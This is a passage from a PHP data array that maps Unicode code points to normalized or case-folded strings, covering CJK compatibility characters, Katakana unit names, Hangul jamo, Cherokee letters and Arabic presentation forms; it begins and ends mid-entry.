'飛', 12215 => '食', 12216 => '首', 12217 => '香', 12218 => '馬', 12219 => '骨', 12220 => '高', 12221 => '髟', 12222 => '鬥', 12223 => '鬯', 12224 => '鬲', 12225 => '鬼', 12226 => '魚', 12227 => '鳥', 12228 => '鹵', 12229 => '鹿', 12230 => '麥', 12231 => '麻', 12232 => '黃', 12233 => '黍', 12234 => '黑', 12235 => '黹', 12236 => '黽', 12237 => '鼎', 12238 => '鼓', 12239 => '鼠', 12240 => '鼻', 12241 => '齊', 12242 => '齒', 12243 => '龍', 12244 => '龜', 12245 => '龠', 12290 => '.', 12342 => '〒', 12344 => '十', 12345 => '卄', 12346 => '卅', 12447 => 'より', 12543 => 'コト', 12593 => 'ᄀ', 12594 => 'ᄁ', 12595 => 'ᆪ', 12596 => 'ᄂ', 12597 => 'ᆬ', 12598 => 'ᆭ', 12599 => 'ᄃ', 12600 => 'ᄄ', 12601 => 'ᄅ', 12602 => 'ᆰ', 12603 => 'ᆱ', 12604 => 'ᆲ', 12605 => 'ᆳ', 12606 => 'ᆴ', 12607 => 'ᆵ', 12608 => 'ᄚ', 12609 => 'ᄆ', 12610 => 'ᄇ', 12611 => 'ᄈ', 12612 => 'ᄡ', 12613 => 'ᄉ', 12614 => 'ᄊ', 12615 => 'ᄋ', 12616 => 'ᄌ', 12617 => 'ᄍ', 12618 => 'ᄎ', 12619 => 'ᄏ', 12620 => 'ᄐ', 12621 => 'ᄑ', 12622 => 'ᄒ', 12623 => 'ᅡ', 12624 => 'ᅢ', 12625 => 'ᅣ', 12626 => 'ᅤ', 12627 => 'ᅥ', 12628 => 'ᅦ', 12629 => 'ᅧ', 12630 => 'ᅨ', 12631 => 'ᅩ', 12632 => 'ᅪ', 12633 => 'ᅫ', 12634 => 'ᅬ', 12635 => 'ᅭ', 12636 => 'ᅮ', 12637 => 'ᅯ', 12638 => 'ᅰ', 12639 => 'ᅱ', 12640 => 'ᅲ', 12641 => 'ᅳ', 12642 => 'ᅴ', 12643 => 'ᅵ', 12645 => 'ᄔ', 12646 => 'ᄕ', 12647 => 'ᇇ', 12648 => 'ᇈ', 12649 => 'ᇌ', 12650 => 'ᇎ', 12651 => 'ᇓ', 12652 => 'ᇗ', 12653 => 'ᇙ', 12654 => 'ᄜ', 12655 => 'ᇝ', 12656 => 'ᇟ', 12657 => 'ᄝ', 12658 => 'ᄞ', 12659 => 'ᄠ', 12660 => 'ᄢ', 12661 => 'ᄣ', 12662 => 'ᄧ', 12663 => 'ᄩ', 12664 => 'ᄫ', 12665 => 'ᄬ', 12666 => 'ᄭ', 12667 => 'ᄮ', 12668 => 'ᄯ', 12669 => 'ᄲ', 12670 => 'ᄶ', 12671 => 'ᅀ', 12672 => 'ᅇ', 12673 => 'ᅌ', 12674 => 'ᇱ', 12675 => 'ᇲ', 12676 => 'ᅗ', 12677 => 'ᅘ', 12678 => 'ᅙ', 12679 => 'ᆄ', 12680 => 'ᆅ', 12681 => 'ᆈ', 12682 => 'ᆑ', 12683 => 'ᆒ', 12684 => 'ᆔ', 12685 => 'ᆞ', 12686 => 'ᆡ', 12690 => '一', 12691 => '二', 12692 => '三', 12693 => '四', 12694 => '上', 12695 => '中', 12696 => '下', 12697 => '甲', 12698 => '乙', 12699 => '丙', 12700 => '丁', 12701 => '天', 12702 => '地', 12703 => '人', 12868 => '問', 12869 => '幼', 12870 => '文', 12871 => '箏', 12880 => 'pte', 12881 => '21', 12882 => '22', 12883 => '23', 12884 => '24', 12885 => '25', 12886 => '26', 12887 => '27', 12888 => '28', 12889 => '29', 12890 => '30', 12891 => '31', 12892 => '32', 12893 => '33', 12894 => '34', 12895 => '35', 12896 => 'ᄀ', 12897 => 'ᄂ', 12898 => 'ᄃ', 12899 => 'ᄅ', 12900 => 'ᄆ', 12901 => 'ᄇ', 12902 => 'ᄉ', 12903 => 'ᄋ', 12904 => 'ᄌ', 12905 => 'ᄎ', 12906 => 'ᄏ', 12907 => 'ᄐ', 12908 => 'ᄑ', 12909 => 'ᄒ', 12910 => '가', 12911 => '나', 12912 => '다', 12913 => '라', 12914 => '마', 12915 => '바', 12916 => '사', 12917 => '아', 12918 => '자', 12919 => '차', 12920 => '카', 12921 => '타', 12922 => '파', 12923 => '하', 12924 => '참고', 12925 => '주의', 12926 => '우', 12928 => '一', 12929 => '二', 12930 => '三', 12931 => '四', 12932 => '五', 12933 => '六', 12934 => '七', 12935 => '八', 12936 => '九', 12937 => '十', 12938 => '月', 12939 => '火', 12940 => '水', 12941 => '木', 12942 => '金', 12943 => '土', 12944 => '日', 12945 => '株', 12946 => '有', 12947 => '社', 12948 => '名', 12949 => '特', 12950 => '財', 12951 => '祝', 12952 => '労', 12953 => '秘', 12954 => '男', 12955 => '女', 12956 => '適', 12957 => '優', 12958 => '印', 12959 => '注', 12960 => '項', 12961 => '休', 12962 => '写', 12963 => '正', 12964 => '上', 12965 => '中', 12966 => '下', 12967 => '左', 12968 => '右', 12969 => '医', 12970 => '宗', 12971 => '学', 12972 => '監', 12973 => '企', 12974 => '資', 12975 => '協', 12976 => '夜', 12977 => '36', 12978 => '37', 12979 => '38', 12980 => '39', 12981 => '40', 12982 => '41', 12983 => '42', 12984 => '43', 12985 => '44', 12986 => '45', 12987 => '46', 12988 => '47', 12989 => '48', 12990 => '49', 12991 => '50', 12992 => '1月', 12993 => '2月', 12994 => '3月', 12995 => '4月', 12996 => '5月', 12997 => '6月', 12998 => '7月', 12999 => '8月', 13000 => '9月', 13001 => '10月', 13002 => '11月', 13003 => '12月', 13004 => 'hg', 13005 => 'erg', 13006 => 'ev', 13007 => 'ltd', 13008 => 'ア', 13009 => 'イ', 13010 => 'ウ', 13011 => 'エ', 13012 => 'オ', 13013 => 'カ', 13014 => 'キ', 13015 => 'ク', 13016 => 'ケ', 13017 => 'コ', 13018 => 'サ', 13019 => 'シ', 13020 => 'ス', 13021 => 'セ', 13022 => 'ソ', 13023 => 'タ', 13024 => 'チ', 13025 => 'ツ', 13026 => 'テ', 13027 => 'ト', 13028 => 'ナ', 13029 => 'ニ', 13030 => 'ヌ', 13031 => 'ネ', 13032 => 'ノ', 13033 => 'ハ', 13034 => 'ヒ', 13035 => 'フ', 13036 => 'ヘ', 13037 => 'ホ', 13038 => 'マ', 13039 => 'ミ', 13040 => 'ム', 13041 => 'メ', 13042 => 'モ', 13043 => 'ヤ', 13044 => 'ユ', 13045 => 'ヨ', 13046 => 'ラ', 13047 => 'リ', 13048 => 'ル', 13049 => 'レ', 13050 => 'ロ', 13051 => 'ワ', 13052 => 'ヰ', 13053 => 'ヱ', 13054 => 'ヲ', 13055 => '令和', 13056 => 'アパート', 13057 => 'アルファ', 13058 => 'アンペア', 13059 => 'アール', 13060 => 'イニング', 13061 => 'インチ', 13062 => 'ウォン', 13063 => 'エスクード', 13064 => 'エーカー', 13065 => 'オンス', 13066 => 'オーム', 13067 => 'カイリ', 13068 => 'カラット', 13069 => 'カロリー', 13070 => 'ガロン', 13071 => 'ガンマ', 13072 => 'ギガ', 13073 => 'ギニー', 13074 => 'キュリー', 13075 => 'ギルダー', 13076 => 'キロ', 13077 => 'キログラム', 13078 => 'キロメートル', 13079 => 'キロワット', 13080 => 'グラム', 13081 => 'グラムトン', 13082 => 'クルゼイロ', 13083 => 'クローネ', 13084 => 'ケース', 13085 => 'コルナ', 13086 => 'コーポ', 13087 => 'サイクル', 13088 => 'サンチーム', 13089 => 'シリング', 13090 => 'センチ', 13091 => 'セント', 13092 => 'ダース', 13093 => 'デシ', 13094 => 'ドル', 13095 => 'トン', 13096 => 'ナノ', 13097 => 'ノット', 13098 => 'ハイツ', 13099 => 'パーセント', 13100 => 'パーツ', 13101 => 'バーレル', 13102 => 'ピアストル', 13103 => 'ピクル', 13104 => 'ピコ', 13105 => 'ビル', 13106 => 'ファラッド', 13107 => 'フィート', 13108 => 'ブッシェル', 13109 => 'フラン', 13110 => 'ヘクタール', 13111 => 'ペソ', 13112 => 'ペニヒ', 13113 => 'ヘルツ', 13114 => 'ペンス', 13115 => 'ページ', 13116 => 'ベータ', 13117 => 'ポイント', 13118 => 'ボルト', 13119 => 'ホン', 13120 => 'ポンド', 13121 => 'ホール', 13122 => 'ホーン', 13123 => 'マイクロ', 13124 => 'マイル', 13125 => 'マッハ', 13126 => 'マルク', 13127 => 'マンション', 13128 => 'ミクロン', 13129 => 'ミリ', 13130 => 'ミリバール', 13131 => 'メガ', 13132 => 'メガトン', 13133 => 'メートル', 13134 => 'ヤード', 13135 => 'ヤール', 13136 => 'ユアン', 13137 => 'リットル', 13138 => 'リラ', 13139 => 'ルピー', 13140 => 'ルーブル', 13141 => 'レム', 13142 => 'レントゲン', 13143 => 'ワット', 13144 => '0点', 13145 => '1点', 13146 => '2点', 13147 => '3点', 13148 => '4点', 13149 => '5点', 13150 => '6点', 13151 => '7点', 13152 => '8点', 13153 => '9点', 13154 => '10点', 13155 => '11点', 13156 => '12点', 13157 => '13点', 13158 => '14点', 13159 => '15点', 13160 => '16点', 13161 => '17点', 13162 => '18点', 13163 => '19点', 13164 => '20点', 13165 => '21点', 13166 => '22点', 13167 => '23点', 13168 => '24点', 13169 => 'hpa', 13170 => 'da', 13171 => 'au', 13172 => 'bar', 13173 => 'ov', 13174 => 'pc', 13175 => 'dm', 13176 => 'dm2', 13177 => 'dm3', 13178 => 'iu', 13179 => '平成', 13180 => '昭和', 13181 => '大正', 13182 => '明治', 13183 => '株式会社', 13184 => 'pa', 13185 => 'na', 13186 => 'μa', 13187 => 'ma', 13188 => 'ka', 13189 => 'kb', 13190 => 'mb', 13191 => 'gb', 13192 => 'cal', 13193 => 'kcal', 13194 => 'pf', 13195 => 'nf', 13196 => 'μf', 13197 => 'μg', 13198 => 'mg', 13199 => 'kg', 13200 => 'hz', 13201 => 'khz', 13202 => 'mhz', 13203 => 'ghz', 13204 => 'thz', 13205 => 'μl', 13206 => 'ml', 13207 => 'dl', 13208 => 'kl', 13209 => 'fm', 13210 => 'nm', 13211 => 'μm', 13212 => 'mm', 13213 => 'cm', 13214 => 'km', 13215 => 'mm2', 13216 => 'cm2', 13217 => 'm2', 13218 => 'km2', 13219 => 'mm3', 13220 => 'cm3', 13221 => 'm3', 13222 => 'km3', 13223 => 'm∕s', 13224 => 'm∕s2', 13225 => 'pa', 13226 => 'kpa', 13227 => 'mpa', 13228 => 'gpa', 13229 => 'rad', 13230 => 'rad∕s', 13231 => 'rad∕s2', 13232 => 'ps', 13233 => 'ns', 13234 => 'μs', 13235 => 'ms', 13236 => 'pv', 13237 => 'nv', 13238 => 'μv', 13239 => 'mv', 13240 => 'kv', 13241 => 'mv', 13242 => 'pw', 13243 => 'nw', 13244 => 'μw', 13245 => 'mw', 13246 => 'kw', 13247 => 'mw', 13248 => 'kω', 13249 => 'mω', 13251 => 'bq', 13252 => 'cc', 13253 => 'cd', 13254 => 'c∕kg', 13256 => 'db', 13257 => 'gy', 13258 => 'ha', 13259 => 'hp', 13260 => 'in', 13261 => 'kk', 13262 => 'km', 13263 => 'kt', 13264 => 'lm', 13265 => 'ln', 13266 => 'log', 13267 => 'lx', 13268 => 'mb', 13269 => 'mil', 13270 => 'mol', 13271 => 'ph', 13273 => 'ppm', 13274 => 'pr', 13275 => 'sr', 13276 => 'sv', 13277 => 'wb', 13278 => 'v∕m', 13279 => 'a∕m', 13280 => '1日', 13281 => '2日', 13282 => '3日', 13283 => '4日', 13284 => '5日', 13285 => '6日', 13286 => '7日', 13287 => '8日', 13288 => '9日', 13289 => '10日', 13290 => '11日', 13291 => '12日', 13292 => '13日', 13293 => '14日', 13294 => '15日', 13295 => '16日', 13296 => '17日', 13297 => '18日', 13298 => '19日', 13299 => '20日', 13300 => '21日', 13301 => '22日', 13302 => '23日', 13303 => '24日', 13304 => '25日', 13305 => '26日', 13306 => '27日', 13307 => '28日', 13308 => '29日', 13309 => '30日', 13310 => '31日', 13311 => 'gal', 42560 => 'ꙁ', 42562 => 'ꙃ', 42564 => 'ꙅ', 42566 => 'ꙇ', 42568 => 'ꙉ', 42570 => 'ꙋ', 42572 => 'ꙍ', 42574 => 'ꙏ', 42576 => 'ꙑ', 42578 => 'ꙓ', 42580 => 'ꙕ', 42582 => 'ꙗ', 42584 => 'ꙙ', 42586 => 'ꙛ', 42588 => 'ꙝ', 42590 => 'ꙟ', 42592 => 'ꙡ', 42594 => 'ꙣ', 42596 => 'ꙥ', 42598 => 'ꙧ', 42600 => 'ꙩ', 42602 => 'ꙫ', 42604 => 'ꙭ', 42624 => 'ꚁ', 42626 => 'ꚃ', 42628 => 'ꚅ', 42630 => 'ꚇ', 42632 => 'ꚉ', 42634 => 'ꚋ', 42636 => 'ꚍ', 42638 => 'ꚏ', 42640 => 'ꚑ', 42642 => 'ꚓ', 42644 => 'ꚕ', 42646 => 'ꚗ', 42648 => 'ꚙ', 42650 => 'ꚛ', 42652 => 'ъ', 42653 => 'ь', 42786 => 'ꜣ', 42788 => 'ꜥ', 42790 => 'ꜧ', 42792 => 'ꜩ', 42794 => 'ꜫ', 42796 => 'ꜭ', 42798 => 'ꜯ', 42802 => 'ꜳ', 42804 => 'ꜵ', 42806 => 'ꜷ', 42808 => 'ꜹ', 42810 => 'ꜻ', 42812 => 'ꜽ', 42814 => 'ꜿ', 42816 => 'ꝁ', 42818 => 'ꝃ', 42820 => 'ꝅ', 42822 => 'ꝇ', 42824 => 'ꝉ', 42826 => 'ꝋ', 42828 => 'ꝍ', 42830 => 'ꝏ', 42832 => 'ꝑ', 42834 => 'ꝓ', 42836 => 'ꝕ', 42838 => 'ꝗ', 42840 => 'ꝙ', 42842 => 'ꝛ', 42844 => 'ꝝ', 42846 => 'ꝟ', 42848 => 'ꝡ', 42850 => 'ꝣ', 42852 => 'ꝥ', 42854 => 'ꝧ', 42856 => 'ꝩ', 42858 => 'ꝫ', 42860 => 'ꝭ', 42862 => 'ꝯ', 42864 => 'ꝯ', 42873 => 'ꝺ', 42875 => 'ꝼ', 42877 => 'ᵹ', 42878 => 'ꝿ', 42880 => 'ꞁ', 42882 => 'ꞃ', 42884 => 'ꞅ', 42886 => 'ꞇ', 42891 => 'ꞌ', 42893 => 'ɥ', 42896 => 'ꞑ', 42898 => 'ꞓ', 42902 => 'ꞗ', 42904 => 'ꞙ', 42906 => 'ꞛ', 42908 => 'ꞝ', 42910 => 'ꞟ', 42912 => 'ꞡ', 42914 => 'ꞣ', 42916 => 'ꞥ', 42918 => 'ꞧ', 42920 => 'ꞩ', 42922 => 'ɦ', 42923 => 'ɜ', 42924 => 'ɡ', 42925 => 'ɬ', 42926 => 'ɪ', 42928 => 'ʞ', 42929 => 'ʇ', 42930 => 'ʝ', 42931 => 'ꭓ', 42932 => 'ꞵ', 42934 => 'ꞷ', 42936 => 'ꞹ', 42938 => 'ꞻ', 42940 => 'ꞽ', 42942 => 'ꞿ', 42946 => 'ꟃ', 42948 => 'ꞔ', 42949 => 'ʂ', 42950 => 'ᶎ', 42951 => 'ꟈ', 42953 => 'ꟊ', 42997 => 'ꟶ', 43000 => 'ħ', 43001 => 'œ', 43868 => 'ꜧ', 43869 => 'ꬷ', 43870 => 'ɫ', 43871 => 'ꭒ', 43881 => 'ʍ', 43888 => 'Ꭰ', 43889 => 'Ꭱ', 43890 => 'Ꭲ', 43891 => 'Ꭳ', 43892 => 'Ꭴ', 43893 => 'Ꭵ', 43894 => 'Ꭶ', 43895 => 'Ꭷ', 43896 => 'Ꭸ', 43897 => 'Ꭹ', 43898 => 'Ꭺ', 43899 => 'Ꭻ', 43900 => 'Ꭼ', 43901 => 'Ꭽ', 43902 => 'Ꭾ', 43903 => 'Ꭿ', 43904 => 'Ꮀ', 43905 => 'Ꮁ', 43906 => 'Ꮂ', 43907 => 'Ꮃ', 43908 => 'Ꮄ', 43909 => 'Ꮅ', 43910 => 'Ꮆ', 43911 => 'Ꮇ', 43912 => 'Ꮈ', 43913 => 'Ꮉ', 43914 => 'Ꮊ', 43915 => 'Ꮋ', 43916 => 'Ꮌ', 43917 => 'Ꮍ', 43918 => 'Ꮎ', 43919 => 'Ꮏ', 43920 => 'Ꮐ', 43921 => 'Ꮑ', 43922 => 'Ꮒ', 43923 => 'Ꮓ', 43924 => 'Ꮔ', 43925 => 'Ꮕ', 43926 => 'Ꮖ', 43927 => 'Ꮗ', 43928 => 'Ꮘ', 43929 => 'Ꮙ', 43930 => 'Ꮚ', 43931 => 'Ꮛ', 43932 => 'Ꮜ', 43933 => 'Ꮝ', 43934 => 'Ꮞ', 43935 => 'Ꮟ', 43936 => 'Ꮠ', 43937 => 'Ꮡ', 43938 => 'Ꮢ', 43939 => 'Ꮣ', 43940 => 'Ꮤ', 43941 => 'Ꮥ', 43942 => 'Ꮦ', 43943 => 'Ꮧ', 43944 => 'Ꮨ', 43945 => 'Ꮩ', 43946 => 'Ꮪ', 43947 => 'Ꮫ', 43948 => 'Ꮬ', 43949 => 'Ꮭ', 43950 => 'Ꮮ', 43951 => 'Ꮯ', 43952 => 'Ꮰ', 43953 => 'Ꮱ', 43954 => 'Ꮲ', 43955 => 'Ꮳ', 43956 => 'Ꮴ', 43957 => 'Ꮵ', 43958 => 'Ꮶ', 43959 => 'Ꮷ', 43960 => 'Ꮸ', 43961 => 'Ꮹ', 43962 => 'Ꮺ', 43963 => 'Ꮻ', 43964 => 'Ꮼ', 43965 => 'Ꮽ', 43966 => 'Ꮾ', 43967 => 'Ꮿ', 63744 => '豈', 63745 => '更', 63746 => '車', 63747 => '賈', 63748 => '滑', 63749 => '串', 63750 => '句', 63751 => '龜', 63752 => '龜', 63753 => '契', 63754 => '金', 63755 => '喇', 63756 => '奈', 63757 => '懶', 63758 => '癩', 63759 => '羅', 63760 => '蘿', 63761 => '螺', 63762 => '裸', 63763 => '邏', 63764 => '樂', 63765 => '洛', 63766 => '烙', 63767 => '珞', 63768 => '落', 63769 => '酪', 63770 => '駱', 63771 => '亂', 63772 => '卵', 63773 => '欄', 63774 => '爛', 63775 => '蘭', 63776 => '鸞', 63777 => '嵐', 63778 => '濫', 63779 => '藍', 63780 => '襤', 63781 => '拉', 63782 => '臘', 63783 => '蠟', 63784 => '廊', 63785 => '朗', 63786 => '浪', 63787 => '狼', 63788 => '郎', 63789 => '來', 63790 => '冷', 63791 => '勞', 63792 => '擄', 63793 => '櫓', 63794 => '爐', 63795 => '盧', 63796 => '老', 63797 => '蘆', 63798 => '虜', 63799 => '路', 63800 => '露', 63801 => '魯', 63802 => '鷺', 63803 => '碌', 63804 => '祿', 63805 => '綠', 63806 => '菉', 63807 => '錄', 63808 => '鹿', 63809 => '論', 63810 => '壟', 63811 => '弄', 63812 => '籠', 63813 => '聾', 63814 => '牢', 63815 => '磊', 63816 => '賂', 63817 => '雷', 63818 => '壘', 63819 => '屢', 63820 => '樓', 63821 => '淚', 63822 => '漏', 63823 => '累', 63824 => '縷', 63825 => '陋', 63826 => '勒', 63827 => '肋', 63828 => '凜', 63829 => '凌', 63830 => '稜', 63831 => '綾', 63832 => '菱', 63833 => '陵', 63834 => '讀', 63835 => '拏', 63836 => '樂', 63837 => '諾', 63838 => '丹', 63839 => '寧', 63840 => '怒', 63841 => '率', 63842 => '異', 63843 => '北', 63844 => '磻', 63845 => '便', 63846 => '復', 63847 => '不', 63848 => '泌', 63849 => '數', 63850 => '索', 63851 => '參', 63852 => '塞', 63853 => '省', 63854 => '葉', 63855 => '說', 63856 => '殺', 63857 => '辰', 63858 => '沈', 63859 => '拾', 63860 => '若', 63861 => '掠', 63862 => '略', 63863 => '亮', 63864 => '兩', 63865 => '凉', 63866 => '梁', 63867 => '糧', 63868 => '良', 63869 => '諒', 63870 => '量', 63871 => '勵', 63872 => '呂', 63873 => '女', 63874 => '廬', 63875 => '旅', 63876 => '濾', 63877 => '礪', 63878 => '閭', 63879 => '驪', 63880 => '麗', 63881 => '黎', 63882 => '力', 63883 => '曆', 63884 => '歷', 63885 => '轢', 63886 => '年', 63887 => '憐', 63888 => '戀', 63889 => '撚', 63890 => '漣', 63891 => '煉', 63892 => '璉', 63893 => '秊', 63894 => '練', 63895 => '聯', 63896 => '輦', 63897 => '蓮', 63898 => '連', 63899 => '鍊', 63900 => '列', 63901 => '劣', 63902 => '咽', 63903 => '烈', 63904 => '裂', 63905 => '說', 63906 => '廉', 63907 => '念', 63908 => '捻', 63909 => '殮', 63910 => '簾', 63911 => '獵', 63912 => '令', 63913 => '囹', 63914 => '寧', 63915 => '嶺', 63916 => '怜', 63917 => '玲', 63918 => '瑩', 63919 => '羚', 63920 => '聆', 63921 => '鈴', 63922 => '零', 63923 => '靈', 63924 => '領', 63925 => '例', 63926 => '禮', 63927 => '醴', 63928 => '隸', 63929 => '惡', 63930 => '了', 63931 => '僚', 63932 => '寮', 63933 => '尿', 63934 => '料', 63935 => '樂', 63936 => '燎', 63937 => '療', 63938 => '蓼', 63939 => '遼', 63940 => '龍', 63941 => '暈', 63942 => '阮', 63943 => '劉', 63944 => '杻', 63945 => '柳', 63946 => '流', 63947 => '溜', 63948 => '琉', 63949 => '留', 63950 => '硫', 63951 => '紐', 63952 => '類', 63953 => '六', 63954 => '戮', 63955 => '陸', 63956 => '倫', 63957 => '崙', 63958 => '淪', 63959 => '輪', 63960 => '律', 63961 => '慄', 63962 => '栗', 63963 => '率', 63964 => '隆', 63965 => '利', 63966 => '吏', 63967 => '履', 63968 => '易', 63969 => '李', 63970 => '梨', 63971 => '泥', 63972 => '理', 63973 => '痢', 63974 => '罹', 63975 => '裏', 63976 => '裡', 63977 => '里', 63978 => '離', 63979 => '匿', 63980 => '溺', 63981 => '吝', 63982 => '燐', 63983 => '璘', 63984 => '藺', 63985 => '隣', 63986 => '鱗', 63987 => '麟', 63988 => '林', 63989 => '淋', 63990 => '臨', 63991 => '立', 63992 => '笠', 63993 => '粒', 63994 => '狀', 63995 => '炙', 63996 => '識', 63997 => '什', 63998 => '茶', 63999 => '刺', 64000 => '切', 64001 => '度', 64002 => '拓', 64003 => '糖', 64004 => '宅', 64005 => '洞', 64006 => '暴', 64007 => '輻', 64008 => '行', 64009 => '降', 64010 => '見', 64011 => '廓', 64012 => '兀', 64013 => '嗀', 64016 => '塚', 64018 => '晴', 64021 => '凞', 64022 => '猪', 64023 => '益', 64024 => '礼', 64025 => '神', 64026 => '祥', 64027 => '福', 64028 => '靖', 64029 => '精', 64030 => '羽', 64032 => '蘒', 64034 => '諸', 64037 => '逸', 64038 => '都', 64042 => '飯', 64043 => '飼', 64044 => '館', 64045 => '鶴', 64046 => '郞', 64047 => '隷', 64048 => '侮', 64049 => '僧', 64050 => '免', 64051 => '勉', 64052 => '勤', 64053 => '卑', 64054 => '喝', 64055 => '嘆', 64056 => '器', 64057 => '塀', 64058 => '墨', 64059 => '層', 64060 => '屮', 64061 => '悔', 64062 => '慨', 64063 => '憎', 64064 => '懲', 64065 => '敏', 64066 => '既', 64067 => '暑', 64068 => '梅', 64069 => '海', 64070 => '渚', 64071 => '漢', 64072 => '煮', 64073 => '爫', 64074 => '琢', 64075 => '碑', 64076 => '社', 64077 => '祉', 64078 => '祈', 64079 => '祐', 64080 => '祖', 64081 => '祝', 64082 => '禍', 64083 => '禎', 64084 => '穀', 64085 => '突', 64086 => '節', 64087 => '練', 64088 => '縉', 64089 => '繁', 64090 => '署', 64091 => '者', 64092 => '臭', 64093 => '艹', 64094 => '艹', 64095 => '著', 64096 => '褐', 64097 => '視', 64098 => '謁', 64099 => '謹', 64100 => '賓', 64101 => '贈', 64102 => '辶', 64103 => '逸', 64104 => '難', 64105 => '響', 64106 => '頻', 64107 => '恵', 64108 => '𤋮', 64109 => '舘', 64112 => '並', 64113 => '况', 64114 => '全', 64115 => '侀', 64116 => '充', 64117 => '冀', 64118 => '勇', 64119 => '勺', 64120 => '喝', 64121 => '啕', 64122 => '喙', 64123 => '嗢', 64124 => '塚', 64125 => '墳', 64126 => '奄', 64127 => '奔', 64128 => '婢', 64129 => '嬨', 64130 => '廒', 64131 => '廙', 64132 => '彩', 64133 => '徭', 64134 => '惘', 64135 => '慎', 64136 => '愈', 64137 => '憎', 64138 => '慠', 64139 => '懲', 64140 => '戴', 64141 => '揄', 64142 => '搜', 64143 => '摒', 64144 => '敖', 64145 => '晴', 64146 => '朗', 64147 => '望', 64148 => '杖', 64149 => '歹', 64150 => '殺', 64151 => '流', 64152 => '滛', 64153 => '滋', 64154 => '漢', 64155 => '瀞', 64156 => '煮', 64157 => '瞧', 64158 => '爵', 64159 => '犯', 64160 => '猪', 64161 => '瑱', 64162 => '甆', 64163 => '画', 64164 => '瘝', 64165 => '瘟', 64166 => '益', 64167 => '盛', 64168 => '直', 64169 => '睊', 64170 => '着', 64171 => '磌', 64172 => '窱', 64173 => '節', 64174 => '类', 64175 => '絛', 64176 => '練', 64177 => '缾', 64178 => '者', 64179 => '荒', 64180 => '華', 64181 => '蝹', 64182 => '襁', 64183 => '覆', 64184 => '視', 64185 => '調', 64186 => '諸', 64187 => '請', 64188 => '謁', 64189 => '諾', 64190 => '諭', 64191 => '謹', 64192 => '變', 64193 => '贈', 64194 => '輸', 64195 => '遲', 64196 => '醙', 64197 => '鉶', 64198 => '陼', 64199 => '難', 64200 => '靖', 64201 => '韛', 64202 => '響', 64203 => '頋', 64204 => '頻', 64205 => '鬒', 64206 => '龜', 64207 => '𢡊', 64208 => '𢡄', 64209 => '𣏕', 64210 => '㮝', 64211 => '䀘', 64212 => '䀹', 64213 => '𥉉', 64214 => '𥳐', 64215 => '𧻓', 64216 => '齃', 64217 => '龎', 64256 => 'ff', 64257 => 'fi', 64258 => 'fl', 64259 => 'ffi', 64260 => 'ffl', 64261 => 'st', 64262 => 'st', 64275 => 'մն', 64276 => 'մե', 64277 => 'մի', 64278 => 'վն', 64279 => 'մխ', 64285 => 'יִ', 64287 => 'ײַ', 64288 => 'ע', 64289 => 'א', 64290 => 'ד', 64291 => 'ה', 64292 => 'כ', 64293 => 'ל', 64294 => 'ם', 64295 => 'ר', 64296 => 'ת', 64298 => 'שׁ', 64299 => 'שׂ', 64300 => 'שּׁ', 64301 => 'שּׂ', 64302 => 'אַ', 64303 => 'אָ', 64304 => 'אּ', 64305 => 'בּ', 64306 => 'גּ', 64307 => 'דּ', 64308 => 'הּ', 64309 => 'וּ', 64310 => 'זּ', 64312 => 'טּ', 64313 => 'יּ', 64314 => 'ךּ', 64315 => 'כּ', 64316 => 'לּ', 64318 => 'מּ', 64320 => 'נּ', 64321 => 'סּ', 64323 => 'ףּ', 64324 => 'פּ', 64326 => 'צּ', 64327 => 'קּ', 64328 => 'רּ', 64329 => 'שּ', 64330 => 'תּ', 64331 => 'וֹ', 64332 => 'בֿ', 64333 => 'כֿ', 64334 => 'פֿ', 64335 => 'אל', 64336 => 'ٱ', 64337 => 'ٱ', 64338 => 'ٻ', 64339 => 'ٻ', 64340 => 'ٻ', 64341 => 'ٻ', 64342 => 'پ', 64343 => 'پ', 64344 => 'پ', 64345 => 'پ', 64346 => 'ڀ', 64347 => 'ڀ', 64348 => 'ڀ', 64349 => 'ڀ', 64350 => 'ٺ', 64351 => 'ٺ', 64352 => 'ٺ', 64353 => 'ٺ', 64354 => 'ٿ', 64355 => 'ٿ', 64356 => 'ٿ', 64357 => 'ٿ', 64358 => 'ٹ', 64359 => 'ٹ', 64360 => 'ٹ', 64361 => 'ٹ', 64362 => 'ڤ', 64363 => 'ڤ', 64364 => 'ڤ', 64365 => 'ڤ', 64366 => 'ڦ', 64367 => 'ڦ', 64368 => 'ڦ', 64369 => 'ڦ', 64370 => 'ڄ', 64371 => 'ڄ', 64372 => 'ڄ', 64373 => 'ڄ', 64374 => 'ڃ', 64375 => 'ڃ', 64376 => 'ڃ', 64377 => 'ڃ', 64378 => 'چ', 64379 => 'چ', 64380 => 'چ', 64381 => 'چ', 64382 => 'ڇ', 64383 => 'ڇ', 64384 => 'ڇ', 64385 => 'ڇ', 64386 => 'ڍ', 64387 => 'ڍ', 64388 => 'ڌ', 64389 => 'ڌ', 64390 => 'ڎ', 64391 => 'ڎ', 64392 => 'ڈ', 64393 => 'ڈ', 64394 => 'ژ', 64395 => 'ژ', 64396 => 'ڑ', 64397 => 'ڑ', 64398 => 'ک', 64399 => 'ک', 64400 => 'ک', 64401 => 'ک', 64402 => 'گ', 64403 => 'گ', 64404 => 'گ', 64405 => 'گ', 64406 => 'ڳ', 64407 => 'ڳ', 64408 => 'ڳ', 64409 => 'ڳ', 64410 => 'ڱ', 64411 => 'ڱ', 64412 => 'ڱ', 64413 => 'ڱ', 64414 => 'ں', 64415 => 'ں', 64416 => 'ڻ', 64417 => 'ڻ', 64418 => 'ڻ', 64419 => 'ڻ', 64420 => 'ۀ', 64421 => 'ۀ', 64422 => 'ہ', 64423 => 'ہ', 64424 => 'ہ', 64425 => 'ہ', 64426 => 'ھ', 64427 => 'ھ', 64428 => 'ھ', 64429 => 'ھ', 64430 => 'ے', 64431 => 'ے', 64432 => 'ۓ', 64433 => 'ۓ', 64467 => 'ڭ', 64468 => 'ڭ', 64469 => 'ڭ', 64470 => 'ڭ', 64471 => 'ۇ', 64472 => 'ۇ', 64473 => 'ۆ', 64474 => 'ۆ', 64475 => 'ۈ', 64476 => 'ۈ', 64477 => 'ۇٴ', 64478 => 'ۋ', 64479 => 'ۋ', 64480 => 'ۅ', 64481 => 'ۅ', 64482 => 'ۉ', 64483 => 'ۉ', 64484 => 'ې', 64485 => 'ې', 64486 => 'ې', 64487 => 'ې', 64488 => 'ى', 64489 => 'ى', 64490 => 'ئا', 64491 => 'ئا', 64492 => 'ئە', 64493 => 'ئە', 64494 => 'ئو', 64495 => 'ئو', 64496 => 'ئۇ', 64497 => 'ئۇ', 64498 => 'ئۆ', 64499 => 'ئۆ', 64500 => 'ئۈ', 64501 => 'ئۈ', 64502 